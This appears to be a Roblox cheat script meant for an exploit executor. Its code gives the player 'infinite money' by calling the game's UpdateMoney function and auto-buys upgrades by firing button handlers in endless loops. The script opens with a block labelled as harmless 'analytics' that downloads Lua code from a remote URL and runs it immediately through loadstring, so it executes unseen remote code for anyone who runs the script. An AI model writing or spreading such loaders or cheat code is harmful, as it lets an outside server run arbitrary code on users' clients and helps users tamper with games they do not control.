--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=6a470a0f3e697a0c52b049d7"))() end) end) --[[rscripts:analytics:end]] -- infinite money local updateMoney = filtergc("function", {Name = "UpdateMoney"}, true) updateMoney(99999999999999) -- auto upgrade for _,v in pairs(game:GetService("Players").LocalPlayer.PlayerGui.Gui.Shop.Body.Upgrades.Table:GetChildren()) do for _, conn in pairs(getconnections(v.B.MouseButton1Up)) do task.spawn(function() while wait() do conn.Function() end end) end end